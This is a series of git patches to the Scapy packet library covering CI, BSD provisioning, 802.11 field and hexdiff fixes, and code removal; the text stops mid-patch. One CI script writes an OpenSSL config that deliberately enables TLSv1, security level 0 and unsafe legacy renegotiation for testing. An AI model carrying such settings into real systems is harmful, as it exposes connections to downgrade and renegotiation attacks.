| 14 ++++++++++++-- doc/vagrant_ci/Vagrantfile | 9 +++++++-- doc/vagrant_ci/provision_freebsd.sh | 6 ++++-- doc/vagrant_ci/provision_netbsd.sh | 7 ++++--- doc/vagrant_ci/provision_openbsd.sh | 6 ++++-- scapy/arch/bpf/supersocket.py | 9 +++++++++ scapy/utils.py | 4 +++- test/bpf.uts | 5 ++++- test/configs/bsd.utsc | 5 ++++- test/fields.uts | 5 +++-- test/regression.uts | 21 ++++++++++++--------- test/run_tests | 3 ++- test/tls.uts | 12 ++++++++++-- test/tls13.uts | 1 + 15 files changed, 84 insertions(+), 30 deletions(-) diff --git a/.config/ci/openssl.py b/.config/ci/openssl.py index 4a28fb932ad..9dfb44092bb 100755 --- a/.config/ci/openssl.py +++ b/.config/ci/openssl.py @@ -38,8 +38,11 @@ """ # Copy and edit -with open(OPENSSL_CONFIG, 'rb') as fd: - DATA = fd.read() +try: + with open(OPENSSL_CONFIG, 'rb') as fd: + DATA = fd.read() +except FileNotFoundError: + DATA = b"" DATA = HEADER + DATA + FOOTER diff --git a/.config/ci/test.sh b/.config/ci/test.sh index e2ed053c58e..62780ab1c92 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -30,11 +30,21 @@ then else UT_FLAGS+=" -K vcan_socket" fi -elif [[ "$OSTYPE" = "darwin"* ]] || [ "$TRAVIS_OS_NAME" = "osx" ] +elif [[ "$OSTYPE" = "darwin"* ]] || [ "$TRAVIS_OS_NAME" = "osx" ] || [[ "$OSTYPE" = "FreeBSD" ]] || [[ "$OSTYPE" = *"bsd"* ]] then OSTOX="bsd" # Travis CI in macOS 10.13+ can't load kexts. Need this for tuntaposx. UT_FLAGS+=" -K tun -K tap" + if [[ "$OSTYPE" = "openbsd"* ]] + then + # Note: LibreSSL 3.6.* does not support X25519 according to + # the cryptogaphy module source code + UT_FLAGS+=" -K libressl" + fi + if [[ "$OSTYPE" = "netbsd" ]] + then + UT_FLAGS+=" -K not_netbsd" + fi fi # pypy @@ -82,7 +92,7 @@ then fi # Configure OpenSSL -export OPENSSL_CONF=$(python `dirname $BASH_SOURCE`/openssl.py) +export OPENSSL_CONF=$($PYTHON `dirname $BASH_SOURCE`/openssl.py) # Dump vars (the others were already dumped in install.sh) echo UT_FLAGS=$UT_FLAGS diff --git a/doc/vagrant_ci/Vagrantfile b/doc/vagrant_ci/Vagrantfile index c5b6af96ff7..59282054ab8 100644 --- a/doc/vagrant_ci/Vagrantfile +++ b/doc/vagrant_ci/Vagrantfile @@ -8,13 +8,18 @@ Vagrant.configure("2") do |config| + config.vm.provider "virtualbox" do |vb| + vb.memory = 1024 + vb.cpus = 2 + end + config.vm.define "openbsd" do |bsd| - bsd.vm.box = "generic/openbsd6" + bsd.vm.box = "generic/openbsd7" bsd.vm.provision "shell", path: "provision_openbsd.sh" end config.vm.define "freebsd" do |bsd| - bsd.vm.box = "freebsd/FreeBSD-13.0-RELEASE" + bsd.vm.box = "freebsd/FreeBSD-13.1-RELEASE" bsd.vm.provision "shell", path: "provision_freebsd.sh" end diff --git a/doc/vagrant_ci/provision_freebsd.sh b/doc/vagrant_ci/provision_freebsd.sh index f3044049951..3077d018467 100644 --- a/doc/vagrant_ci/provision_freebsd.sh +++ b/doc/vagrant_ci/provision_freebsd.sh @@ -5,13 +5,15 @@ # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi +PACKAGES="git python2 python39 py39-virtualenv py39-pip py27-sqlite3 py39-sqlite3 bash rust sudo" + pkg update -pkg install --yes git python2 python3 py37-virtualenv py27-sqlite3 py37-sqlite3 bash rust +pkg install --yes $PACKAGES bash git clone https://github.com/secdev/scapy cd scapy export PATH=/usr/local/bin/:$PATH -virtualenv-3.7 -p python3.7 venv +virtualenv-3.9 -p python3.9 venv source venv/bin/activate pip install tox chown -R vagrant:vagrant /home/vagrant/scapy diff --git a/doc/vagrant_ci/provision_netbsd.sh b/doc/vagrant_ci/provision_netbsd.sh index e887d606437..a4d59bd27e4 100644 --- a/doc/vagrant_ci/provision_netbsd.sh +++ b/doc/vagrant_ci/provision_netbsd.sh @@ -5,17 +5,18 @@ # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -RELEASE="9.0_2020Q4" +RELEASE="9.0_2022Q2" +PACKAGES="git python27 python39 py39-virtualenv py27-sqlite3 py39-sqlite3 py39-expat rust mozilla-rootcerts-openssl" sudo -s unset PROMPT_COMMAND export PATH="/sbin:/usr/pkg/sbin:/usr/pkg/bin:$PATH" export PKG_PATH="http://ftp.netbsd.org/pub/pkgsrc/packages/NetBSD/amd64/${RELEASE}/All/" pkg_delete curl -pkg_add git python27 python38 py38-virtualenv py27-sqlite3 py38-sqlite3 py38-expat rust mozilla-rootcerts-openssl +pkg_add -u $PACKAGES git clone https://github.com/secdev/scapy cd scapy -virtualenv-3.8 venv +virtualenv-3.9 venv . venv/bin/activate pip install tox chown -R vagrant:vagrant ../scapy/ diff --git a/doc/vagrant_ci/provision_openbsd.sh b/doc/vagrant_ci/provision_openbsd.sh index 397c4b8653f..1759249f391 100644 --- a/doc/vagrant_ci/provision_openbsd.sh +++ b/doc/vagrant_ci/provision_openbsd.sh @@ -5,13 +5,15 @@ # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -sudo pkg_add git python-2.7.18p0 python3 py-virtualenv +PACKAGES="git python3 py3-virtualenv py3-cryptography" + +sudo pkg_add $PACKAGES sudo mkdir -p /usr/local/test/ sudo chown -R vagrant:vagrant /usr/local/test/ cd /usr/local/test/ git clone https://github.com/secdev/scapy cd scapy -virtualenv venv +virtualenv --system-site-packages venv source venv/bin/activate pip install tox sudo chown -R vagrant:vagrant /usr/local/test/ diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 3610cba2204..4f3aea6cd32 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -477,6 +477,15 @@ def send(self, pkt): # with Apple Silicon (M1). if DARWIN and iff.startswith('tun') and self.guessed_cls == Loopback: frame = raw(pkt) + elif FREEBSD and (iff.startswith('tun') or iff.startswith('tap')): + # On FreeBSD, the bpf manpage states that it is only possible + # to write packets to Ethernet and SLIP network interfaces + # using /dev/bpf + # + # Note: `open("/dev/tun0", "wb").write(raw(pkt())) should be + # used + warning("Cannot write to %s according to the documentation!", iff) + return else: frame = raw(self.guessed_cls() / pkt) diff --git a/scapy/utils.py b/scapy/utils.py index e8a77061e71..c834be55ea5 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -35,7 +35,7 @@ from scapy.config import conf from scapy.consts import DARWIN, OPENBSD, WINDOWS -from scapy.data import MTU, DLT_EN10MB +from scapy.data import MTU, DLT_EN10MB, DLT_RAW from scapy.compat import orb, plain_str, chb, bytes_base64,\ base64_bytes, hex_bytes, lambda_tuple_converter, bytes_encode from scapy.error import log_runtime, Scapy_Exception, warning @@ -2718,6 +2718,8 @@ def tcpdump( try: _, metadata = rd._read_packet() linktype = metadata.linktype + if OPENBSD and linktype == 228: + linktype = DLT_RAW except EOFError: raise ValueError( "Cannot get linktype from a PcapNg packet." diff --git a/test/bpf.uts b/test/bpf.uts index 2be16fc8786..fa4db648f5d 100644 --- a/test/bpf.uts +++ b/test/bpf.uts @@ -147,7 +147,10 @@ s.assigned_interface = conf.loopback_name s.send(IP(dst="8.8.8.8")/ICMP()) = L3bpfSocket - send and sniff on loopback -~ needs_root +~ needs_root not_netbsd + +# Note: as of November 2022, it is not possible to send packet on lo0 +# using bpf on NetBSD 9.3 localhost_ip = conf.ifaces[conf.loopback_name].ips[4][0] diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index f1ac3007460..170fa0f664d 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -15,6 +15,7 @@ "test/windows.uts", "test/contrib/automotive/ecu_am.uts", "test/contrib/automotive/gm/gmlanutils.uts", + "test/contrib/isotp_packet.uts", "test/contrib/isotpscan.uts" ], "onlyfailed": true, @@ -28,6 +29,8 @@ "linux", "windows", "ipv6", - "vcan_socket" + "vcan_socket", + "tun", + "tap" ] } diff --git a/test/fields.uts b/test/fields.uts index 8d26f379c7d..2e756874aae 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -133,8 +133,9 @@ assert Test(raw(Test())).sourceip == defaddr assert IP(dst="0.0.0.0").src == defaddr assert IP(raw(IP(dst="0.0.0.0"))).src == defaddr -assert IP(dst="0.0.0.0/31").src == defaddr -assert IP(raw(IP(dst="0.0.0.0/31"))).src == defaddr +defaddr = conf.route.route('1.1.1.1')[1] +assert IP(dst="1.1.1.1").src == defaddr +assert IP(raw(IP(dst="1.1.1.1"))).src == defaddr #= ByteField diff --git a/test/regression.uts b/test/regression.uts index e3c907e4896..719cbdf6620 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2047,15 +2047,18 @@ os.unlink(filename) pcapng_data = b'\n\r\r\n`\x00\x00\x00M<+\x1a\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x04\x009\x00TShark (Wireshark) 3.2.3 (Git v3.2.3 packaged as 3.2.3-1)\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\xe4\x00\x00\x00\xff\xff\x00\x00\x14\x00\x00\x00\x06\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x98\xcd\x05\x00\x19\x83\xf7\x9e\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x11|\xce\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x00\x08\x01r<\x00\x00\x00' -fdesc, filename = tempfile.mkstemp() -os.close(fdesc) -fd = open(filename, "wb") -fd.write(pcapng_data) -fd.close() - -packets = sniff(offline=filename, filter="udp") -os.unlink(filename) -assert UDP in packets[0] +if OPENBSD: + # Note: OpenBSD tcpdump does not support PcapNg + assert True +else: + fdesc, filename = tempfile.mkstemp() + os.close(fdesc) + fd = open(filename, "wb") + fd.write(pcapng_data) + fd.close() + packets = sniff(offline=filename, filter="udp") + os.unlink(filename) + assert UDP in packets[0] = Check offline sniff() with Packets and tcpdump with a filter ~ tcpdump libpcap diff --git a/test/run_tests b/test/run_tests index 7304855b0b6..5d886e20a54 100755 --- a/test/run_tests +++ b/test/run_tests @@ -56,8 +56,9 @@ then # Run tox export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only -K vcan_socket -K automotive_comm -K imports -K scanner" export SIMPLE_TESTS="true" + export PYTHON PYVER=$($PYTHON -c "import sys; print('.'.join(sys.version.split('.')[:2]))") - ${DIR}/.config/ci/test.sh $PYVER non_root + bash ${DIR}/.config/ci/test.sh $PYVER non_root exit $? fi PYTHONPATH=$DIR exec "$PYTHON" ${DIR}/scapy/tools/UTscapy.py $ARGS diff --git a/test/tls.uts b/test/tls.uts index abfa438d044..56ec331066d 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -591,7 +591,7 @@ _all_aes_gcm_tests() = Crypto - AES cipher in CCM mode, checks from IEEE P1619.1 -~ crypto_advanced +~ crypto_advanced libressl class _aes256ccm_test_1: k= b"\0"*32 @@ -649,7 +649,7 @@ _all_aes_ccm_tests() = Crypto - ChaCha20POly1305 test (test vector A.5 from RFC 7539) -~ crypto_advanced +~ crypto_advanced libressl import binascii def clean(s): @@ -963,6 +963,8 @@ fin.load == b'\xd9\xcb,\x8cM\xfd\xbc9\xaa\x05\xf3\xd3\xf3Z\x8a-' = Reading TLS test session - Ticket, CCS & Finished +~ libressl + from scapy.layers.tls.handshake import TLSNewSessionTicket t6 = TLS(p6_tick_ccs_fin, tls_session=t5.tls_session.mirror()) tick = t6.msg[0] @@ -980,6 +982,7 @@ assert isinstance(rec_fin.msg[0], _TLSEncryptedContent) rec_fin.msg[0].load == b'7\\)`\xaa`\x7ff\xcd\x10\xa9v\xa3*\x17\x1a' = Building x25519 ecdh_Yc +~ libressl from scapy.layers.tls.record import TLS from scapy.layers.tls.handshake import TLSClientKeyExchange @@ -1000,6 +1003,7 @@ pkt.exchkeys.fill_missing() assert len(pkt.exchkeys.ecdh_Yc) == 32 = Reading TLS test session - Extended master secret +~ libressl # See https://github.com/secdev/scapy/issues/2784 @@ -1050,6 +1054,8 @@ assert isinstance(l3.msg[0], TLSFinished) assert l3.msg[0][TLSFinished].vdata == b'\x15\xd6\xd5\xea\x84\xee\xb3\xdd\xd6\x10\xd8\x11' = Reading TLS test session - Encrypt-then-MAC extension +~ libressl + from scapy.layers.tls.cert import PrivKey from scapy.layers.tls.handshake import TLSFinished from scapy.layers.tls.record import TLS @@ -1080,6 +1086,7 @@ assert server_finished.vdata == hex_bytes(b'42c9765e833997b6714fec75') ### = Reading TLS test session - Full TLSNewSessionTicket captured +~ libressl import os filename = scapy_path("/test/pcaps/tls_new-session-ticket.pcap") a = rdpcap(filename) @@ -1089,6 +1096,7 @@ assert pkt[TLS].msg[0].ticket == b'6k\x8b{\xa8\xaf\xf0\x8aG*\xdd\xc2\xf6\t\xde\x assert pkt[TLS].msg[0].lifetime == 3600 = Reading TLS test session - ApplicationData +~ libressl t7 = TLS(p7_data, tls_session=t6.tls_session.mirror()) assert t7.iv == b'\x00\x00\x00\x00\x00\x00\x00\x01' assert t7.mac == b'>\x1dLb5\x8e+\x01n\xcb\x19\xcc\x17Ey\xc8' diff --git a/test/tls13.uts b/test/tls13.uts index f5eb67d33b2..b2b1bfae558 100644 --- a/test/tls13.uts +++ b/test/tls13.uts @@ -3,6 +3,7 @@ # Try me with : # bash test/run_tests -t test/tls13.uts -F +~ libressl + Read a protected TLS 1.3 session # /!\ These tests will not catch our 'INTEGRITY CHECK FAILED's. /!\ From e1a2e807c3ae04d1448953da4e768b5e1b8a3289 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 4 Dec 2022 18:01:02 +0100 Subject: [PATCH 0931/1632] Run 2.7 tests on <=20.04 --- .github/workflows/unittests.yml | 28 +++++++++++++--------------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 15bc77c2daf..1569a3468c4 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -58,6 +58,8 @@ jobs: - name: Run mypy run: tox -e mypy + # https://github.com/actions/runner-images/issues/6399 + # Python 2.7 tests must be run on ubuntu <= 20.04 utscapy: name: ${{ matrix.os }} ${{ matrix.installmode }} ${{ matrix.python }} ${{ matrix.mode }} ${{ matrix.flags }} runs-on: ${{ matrix.os }} @@ -67,27 +69,23 @@ jobs: fail-fast: false matrix: os: [ubuntu-latest] - python: ["2.7", "3.10"] - mode: [both] + python: ["3.7", "3.8", "3.9", "3.10"] + mode: [non_root] installmode: [''] flags: [''] allow-failure: [false] include: - # Linux non-root only tests - - os: ubuntu-latest - python: "3.7" - mode: non_root - allow-failure: false - - os: ubuntu-latest - python: "3.8" - mode: non_root + # Linux root tests + - os: ubuntu-20.04 + python: "2.7" + mode: root allow-failure: false - os: ubuntu-latest - python: "3.9" - mode: non_root + python: "3.10" + mode: root allow-failure: false # PyPy tests: root only - - os: ubuntu-latest + - os: ubuntu-20.04 python: "pypy2.7" mode: root allow-failure: false @@ -112,7 +110,8 @@ jobs: python: "3.10" mode: both allow-failure: false - - os: ubuntu-latest + # Scanner tests + - os: ubuntu-20.04 python: "pypy2.7" mode: root allow-failure: true @@ -122,7 +121,6 @@ jobs: mode: root allow-failure: true flags: " -k scanner" - # MacOS tests - os: macos-12 python: "3.10" mode: both From 3c66f92e318e3b7478d4cc68cc1c15868a6a1221 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 9 Dec 2022 01:47:26 +0100 Subject: [PATCH 0932/1632] CI fixes: openssl 3.0 config, tox 4.. etc. --- .config/ci/openssl.py | 32 ++++++++++++-------------------- .config/ci/test.sh | 4 +++- tox.ini | 37 +++++++++++++++++++++++++++---------- 3 files changed, 42 insertions(+), 31 deletions(-) diff --git a/.config/ci/openssl.py b/.config/ci/openssl.py index 9dfb44092bb..07857d20c9a 100755 --- a/.config/ci/openssl.py +++ b/.config/ci/openssl.py @@ -21,31 +21,23 @@ ).group(1).decode() OPENSSL_CONFIG = os.path.join(OPENSSL_DIR, 'openssl.cnf') -# https://askubuntu.com/a/1233456 -HEADER = b"openssl_conf = default_conf\n" -FOOTER = b""" -[ default_conf ] +# https://www.openssl.org/docs/manmaster/man5/config.html +DATA = b""" +openssl_conf = openssl_init -ssl_conf = ssl_sect +[openssl_init] +ssl_conf = ssl_configuration -[ssl_sect] +[ssl_configuration] +system_default = tls_system_default -system_default = system_default_sect - -[system_default_sect] -MinProtocol = TLSv1.2 -CipherString = DEFAULT:@SECLEVEL=1 -""" +[tls_system_default] +MinProtocol = TLSv1 +CipherString = DEFAULT:@SECLEVEL=0 +Options = UnsafeLegacyRenegotiation +""".strip() # Copy and edit -try: - with open(OPENSSL_CONFIG, 'rb') as fd: - DATA = fd.read() -except FileNotFoundError: - DATA = b"" - -DATA = HEADER + DATA + FOOTER - with tempfile.NamedTemporaryFile(suffix=".cnf", delete=False) as fd: fd.write(DATA) print(fd.name) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 62780ab1c92..e5592a63c6c 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -92,11 +92,13 @@ then fi # Configure OpenSSL -export OPENSSL_CONF=$($PYTHON `dirname $BASH_SOURCE`/openssl.py) +export OPENSSL_CONF=$(python `dirname $BASH_SOURCE`/openssl.py) # Dump vars (the others were already dumped in install.sh) echo UT_FLAGS=$UT_FLAGS echo TOXENV=$TOXENV +echo OPENSSL_CONF=$OPENSSL_CONF +echo OPENSSL_VER=$(openssl version) # Launch Scapy unit tests TOX_PARALLEL_NO_SPINNER=1 tox -- ${UT_FLAGS} || exit 1 diff --git a/tox.ini b/tox.ini index 40e3e662cf9..90957573a75 100644 --- a/tox.ini +++ b/tox.ini @@ -12,11 +12,17 @@ minversion = 2.9 [testenv] description = "Scapy unit tests" -whitelist_externals = sudo +allowlist_externals = sudo parallel_show_output = true -passenv = PATH PWD PROGRAMFILES WINDIR SYSTEMROOT OPENSSL_CONF - # Used by scapy - SCAPY_USE_LIBPCAP +passenv = + PATH + PWD + PROGRAMFILES + WINDIR + SYSTEMROOT + OPENSSL_CONF + # Used by scapy + SCAPY_USE_LIBPCAP deps = mock # cryptography requirements setuptools>=18.5 @@ -43,12 +49,17 @@ commands = [testenv:py38-isotp_kernel_module] description = "Scapy unit tests - ISOTP Linux kernel module" -whitelist_externals = sudo +allowlist_externals = sudo git bash lsmod modprobe -passenv = PATH PWD PROGRAMFILES WINDIR SYSTEMROOT +passenv = + PATH + PWD + PROGRAMFILES + WINDIR + SYSTEMROOT deps = {[testenv]deps} commands = sudo apt-get -qy install build-essential linux-headers-$(uname -r) linux-modules-extra-$(uname -r) @@ -75,7 +86,13 @@ commands = [testenv:codecov] description = "Upload coverage results to codecov" -passenv = TOXENV CI TRAVIS TRAVIS_* APPVEYOR APPVEYOR_* +passenv = + TOXENV + CI + TRAVIS + TRAVIS_* + APPVEYOR + APPVEYOR_* deps = codecov commands = codecov -e TOXENV @@ -84,7 +101,7 @@ commands = codecov -e TOXENV [testenv:apitree] description = "Regenerates the API reference doc tree" skip_install = true -changedir = doc/scapy +changedir = {toxinidir}/doc/scapy deps = sphinx commands = sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/ ../../scapy/libs/ ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/scada/* ../../scapy/all.py ../../scapy/layers/all.py ../../scapy/compat.py @@ -103,7 +120,7 @@ commands = python .config/mypy/mypy_check.py linux [testenv:docs] description = "Build the docs" skip_install = true -changedir = doc/scapy +changedir = {toxinidir}/doc/scapy deps = sphinx>=2.4.2 sphinx_rtd_theme commands = @@ -114,7 +131,7 @@ commands = [testenv:docs2] description = "Build the docs without rebuilding the API tree" skip_install = true -changedir = doc/scapy +changedir = {toxinidir}/doc/scapy deps = {[testenv:docs]deps} setenv = SCAPY_APITREE = 0 From f4715e63df090fb7121506dd3db1203278bdb1cc Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 8 Dec 2022 22:17:27 +0100 Subject: [PATCH 0933/1632] Fix 802.11 control frames type 1 addr Fix #3808 --- scapy/layers/dot11.py | 7 +++++-- test/scapy/layers/dot11.uts | 12 ++++++++++++ 2 files changed, 17 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index bc5703fdea0..530cdaba550 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -713,11 +713,12 @@ class Dot11(Packet): ConditionalField( _Dot11MacField("addr2", ETHER_ANY, 2), lambda pkt: (pkt.type != 1 or - pkt.subtype in [0x8, 0x9, 0xa, 0xb, 0xe, 0xf]), + pkt.subtype in [0x4, 0x5, 0x6, 0x8, 0x9, 0xa, 0xb, 0xe, 0xf]), ), ConditionalField( _Dot11MacField("addr3", ETHER_ANY, 3), - lambda pkt: pkt.type in [0, 2], + lambda pkt: (pkt.type in [0, 2] or + ((pkt.type, pkt.subtype) == (1, 6) and pkt.cfe == 6)), ), ConditionalField(LEShortField("SC", 0), lambda pkt: pkt.type != 1), ConditionalField( @@ -770,6 +771,8 @@ def address_meaning(self, index): if self.type == 0: # Management return _dot11_addr_meaning[0][index] elif self.type == 1: # Control + if (self.type, self.subtype) == (1, 6) and self.cfe == 6: + return ["RA", "NAV-SA", "NAV-DA"][index] return _dot11_addr_meaning[1][index] elif self.type == 2: # Data meaning = _dot11_addr_meaning[2][index][ diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 7bed426a9f2..df8dd1964a3 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -61,6 +61,18 @@ assert Dot11Elt(info="scapy").summary() == "SSID='scapy'" assert Dot11Elt(ID=1).mysummary() == "" assert Dot11(b'\x84\x00\x00\x00\x00\x11\x22\x33\x44\x55\x00\x11\x22\x33\x44\x55').addr2 == '00:11:22:33:44:55' += Dot11 - type 1 subtype 4, 5, 6 + +assert raw(Dot11(type=1, subtype=4, addr2="ff:ff:ff:ff:ff:ff")) == b'D\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff' +assert raw(Dot11(type=1, subtype=5, addr2="ff:ff:ff:ff:ff:ff")) == b'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff' +assert raw(Dot11(type=1, subtype=6, addr2="ff:ff:ff:ff:ff:ff", cfe=3)) == b'd0\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff' +assert raw(Dot11(type=1, subtype=6, addr2="ff:ff:ff:ff:ff:ff", cfe=6, addr3="aa:aa:aa:aa:aa:aa")) == b'd`\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xaa\xaa\xaa\xaa\xaa\xaa' + +assert Dot11(type=1, subtype=5).address_meaning(1) == 'RA' +assert Dot11(type=1, subtype=6, cfe=5).address_meaning(2) == 'TA' +assert Dot11(type=1, subtype=6, cfe=6).address_meaning(2) == 'NAV-SA' +assert Dot11(type=1, subtype=6, cfe=6).address_meaning(3) == 'NAV-DA' + = Multiple Dot11Elt layers pkt = Dot11() / Dot11Beacon() / Dot11Elt(ID="Supported Rates") / Dot11Elt(ID="SSID", info="Scapy") assert pkt[Dot11Elt::{"ID": 0}].info == b"Scapy" From 5370ef2271dba1e06d733ea1d3e3bfadfd3525d4 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 9 Dec 2022 19:58:49 +0100 Subject: [PATCH 0934/1632] Use $PYTHON if it exists --- .config/ci/test.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index e5592a63c6c..7a8a5548c17 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -92,7 +92,7 @@ then fi # Configure OpenSSL -export OPENSSL_CONF=$(python `dirname $BASH_SOURCE`/openssl.py) +export OPENSSL_CONF=$(${PYTHON:=python} `dirname $BASH_SOURCE`/openssl.py) # Dump vars (the others were already dumped in install.sh) echo UT_FLAGS=$UT_FLAGS From 0e88e8f6c7fafd8a44d4545ddcf964fd4463e8fa Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 10 Dec 2022 12:46:56 +0100 Subject: [PATCH 0935/1632] hexdiff() - check input length --- scapy/utils.py | 2 +- test/regression.uts | 5 +++++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index c834be55ea5..fa999a2dce4 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -455,7 +455,7 @@ def hexdiff(a, b, autojunk=False): cl = "" for j in range(16): - if i + j < btx_len: + if i + j < min(len(backtrackx), len(backtracky)): if line[j]: col = colorize[(linex[j] != liney[j]) * (doy - dox)] print(col("%02X" % orb(line[j])), end=' ') diff --git a/test/regression.uts b/test/regression.uts index 719cbdf6620..2925ac41b68 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -772,6 +772,11 @@ assert ret1 != ret2 assert expected_ret1 in ret1 assert expected_ret2 in ret2 +# Test corner cases that should not crash + +hexdiff(b"abc", IP() / TCP()) +hexdiff(IP() / TCP(), b"abc") + = Test mysummary functions - Ether p = Ether(dst="ff:ff:ff:ff:ff:ff", src="ff:ff:ff:ff:ff:ff", type=0x9000) From ef352bd7fd56219cb01bc16d58cdbd6129824dbe Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 23 Dec 2022 11:41:24 +0100 Subject: [PATCH 0936/1632] Bugfix in automotive staged enumerators (#3803) * remove scanner tests from pypy * remove scanner tests from pypy * Fix minor bug in argument passing of staged_test_cases * remove scanner tests from all tests which are not allowed to fail * update * disable scanner tests for all tests which are not allowed to fail * update default values of github CI * try to fix ci * try to fix ci * try to fix ci * try to fix ci Co-authored-by: Nils Weiss --- .github/workflows/unittests.yml | 34 ++++++++++++------- .../automotive/scanner/staged_test_case.py | 2 +- 2 files changed, 22 insertions(+), 14 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 1569a3468c4..d083b19d4b2 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -64,7 +64,7 @@ jobs: name: ${{ matrix.os }} ${{ matrix.installmode }} ${{ matrix.python }} ${{ matrix.mode }} ${{ matrix.flags }} runs-on: ${{ matrix.os }} timeout-minutes: 20 - continue-on-error: ${{ matrix.allow-failure }} + continue-on-error: ${{ matrix.allow-failure == 'true' }} strategy: fail-fast: false matrix: @@ -72,59 +72,67 @@ jobs: python: ["3.7", "3.8", "3.9", "3.10"] mode: [non_root] installmode: [''] - flags: [''] - allow-failure: [false] + flags: [" -K scanner"] + allow-failure: ['false'] include: # Linux root tests - os: ubuntu-20.04 python: "2.7" mode: root - allow-failure: false + flags: " -K scanner" - os: ubuntu-latest python: "3.10" mode: root - allow-failure: false + flags: " -K scanner" # PyPy tests: root only - os: ubuntu-20.04 python: "pypy2.7" mode: root - allow-failure: false flags: " -K scanner" - os: ubuntu-latest python: "pypy3.9" mode: root - allow-failure: false flags: " -K scanner" # Libpcap test - os: ubuntu-latest python: "3.10" mode: root installmode: 'libpcap' - allow-failure: false + flags: " -K scanner" # MacOS tests - os: macos-12 python: "2.7" mode: both - allow-failure: false + flags: " -K scanner" - os: macos-12 python: "3.10" mode: both - allow-failure: false + flags: " -K scanner" # Scanner tests + - os: ubuntu-20.04 + python: "2.7" + mode: root + allow-failure: 'true' + flags: " -k scanner" + - os: ubuntu-latest + python: "3.10" + mode: root + allow-failure: 'true' + flags: " -k scanner" - os: ubuntu-20.04 python: "pypy2.7" mode: root - allow-failure: true + allow-failure: 'true' flags: " -k scanner" - os: ubuntu-latest python: "pypy3.9" mode: root - allow-failure: true + allow-failure: 'true' flags: " -k scanner" - os: macos-12 python: "3.10" mode: both - allow-failure: true + allow-failure: 'true' flags: " -k scanner" steps: - name: Checkout Scapy diff --git a/scapy/contrib/automotive/scanner/staged_test_case.py b/scapy/contrib/automotive/scanner/staged_test_case.py index dc7a6361707..543327329d1 100644 --- a/scapy/contrib/automotive/scanner/staged_test_case.py +++ b/scapy/contrib/automotive/scanner/staged_test_case.py @@ -201,7 +201,7 @@ def pre_execute(self, def execute(self, socket, state, **kwargs): # type: (_SocketUnion, EcuState, Any) -> None - kwargs = self.__current_kwargs or dict() + kwargs.update(self.__current_kwargs or dict()) self.current_test_case.execute(socket, state, **kwargs) def post_execute(self, From 9473f77d8b548c8e478e52838bdd4c12f5d4f4ff Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 24 Dec 2022 15:06:26 +0100 Subject: [PATCH 0937/1632] Remove NC code (#3824) --- scapy/volatile.py | 113 ---------------------------------------------- test/random.uts | 94 -------------------------------------- 2 files changed, 207 deletions(-) diff --git a/scapy/volatile.py b/scapy/volatile.py index bbd331199f6..8e9490a16d8 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -22,7 +22,6 @@ from scapy.base_classes import Net from scapy.compat import bytes_encode, chb, plain_str from scapy.utils import corrupt_bits, corrupt_bytes -from scapy.libs.six.moves import zip_longest from scapy.compat import ( List, @@ -1412,115 +1411,3 @@ class CorruptedBits(CorruptedBytes): def _fix(self): # type: () -> bytes return corrupt_bits(self.s, 